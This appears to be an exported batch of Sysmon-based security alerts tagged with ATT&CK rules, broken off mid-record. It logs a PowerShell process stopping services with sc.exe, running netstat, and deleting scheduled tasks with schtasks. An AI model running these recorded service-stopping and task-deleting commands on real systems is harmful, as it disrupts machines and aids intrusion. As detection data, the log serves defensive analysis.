\""C:\\Windows\\system32\\sc.exe\"" Stop SVSHost\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:54.829"",""processGuid"":""{df9fc3d3-b3ae-5ecf-0000-00106aa82500}"",""processId"":""3496"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SVSHost"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:22.963",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:54.778 +ProcessGuid: {df9fc3d3-b3ae-5ecf-0000-0010f7a52500} +ProcessId: 4816 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop xWinWpdSrv +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop xWinWpdSrv",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:54.781730000Z"",""eventRecordID"":""2849"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:54.778\r\nProcessGuid: {df9fc3d3-b3ae-5ecf-0000-0010f7a52500}\r\nProcessId: 4816\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop xWinWpdSrv\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:54.778"",""processGuid"":""{df9fc3d3-b3ae-5ecf-0000-0010f7a52500}"",""processId"":""4816"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop xWinWpdSrv"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:02.775",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:34.393 +ProcessGuid: {df9fc3d3-b39a-5ecf-0000-0010da232200} +ProcessId: 2096 +Image: C:\Windows\System32\NETSTAT.EXE +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: TCP/IP Netstat Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: netstat.exe +CommandLine: ""C:\Windows\system32\NETSTAT.EXE"" -anop TCP 
+CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=2445DECE99DEEDBD701DC6DFE10E648E,SHA256=5A780D6630639FFB7FD3D295C182EAA2A7CAD2C70248C5BA8F334BB3803353CA,IMPHASH=F495C58FFEE3A623AD7AAA6BE78756D5 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\NETSTAT.EXE\"" -anop TCP",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:34.413366800Z"",""eventRecordID"":""2842"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:34.393\r\nProcessGuid: {df9fc3d3-b39a-5ecf-0000-0010da232200}\r\nProcessId: 2096\r\nImage: C:\\Windows\\System32\\NETSTAT.EXE\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: TCP/IP Netstat Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: netstat.exe\r\nCommandLine: \""C:\\Windows\\system32\\NETSTAT.EXE\"" -anop TCP\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=2445DECE99DEEDBD701DC6DFE10E648E,SHA256=5A780D6630639FFB7FD3D295C182EAA2A7CAD2C70248C5BA8F334BB3803353CA,IMPHASH=F495C58FFEE3A623AD7AAA6BE78756D5\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:34.393"",""processGuid"":""{df9fc3d3-b39a-5ecf-0000-0010da232200}"",""processId"":""2096"",""image"":""C:\\\\Windows\\\\System32\\\\NETSTAT.EXE"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""TCP/IP Netstat Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""netstat.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\NETSTAT.EXE\\\"" -anop TCP"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=2445DECE99DEEDBD701DC6DFE10E648E,SHA256=5A780D6630639FFB7FD3D295C182EAA2A7CAD2C70248C5BA8F334BB3803353CA,IMPHASH=F495C58FFEE3A623AD7AAA6BE78756D5"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:02.362",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:33.031 +ProcessGuid: {df9fc3d3-b399-5ecf-0000-0010eef62100} +ProcessId: 6112 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 
(WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ECDnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ECDnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:33.035819600Z"",""eventRecordID"":""2841"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:33.031\r\nProcessGuid: {df9fc3d3-b399-5ecf-0000-0010eef62100}\r\nProcessId: 6112\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ECDnsCore /F\r\nCurrentDirectory: 
C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:33.031"",""processGuid"":""{df9fc3d3-b399-5ecf-0000-0010eef62100}"",""processId"":""6112"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ECDnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:02.314",14,"ATT&CK T1064: 
Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.994 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-001028f52100} +ProcessId: 7588 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:33.002732600Z"",""eventRecordID"":""2840"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.994\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-001028f52100}\r\nProcessId: 7588\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler 
Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.994"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-001028f52100}"",""processId"":""7588"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:02.275",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.947 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-00100bf32100} +ProcessId: 6024 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Update service for Windows Service"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for Windows Service\"" 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.953201400Z"",""eventRecordID"":""2839"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.947\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-00100bf32100}\r\nProcessId: 6024\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for Windows Service\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.947"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-00100bf32100}"",""processId"":""6024"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler 
Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Update service for Windows Service\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:02.260",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.899 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-001059f12100} +ProcessId: 3844 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: 
{df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.902820500Z"",""eventRecordID"":""2838"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.899\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-001059f12100}\r\nProcessId: 3844\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 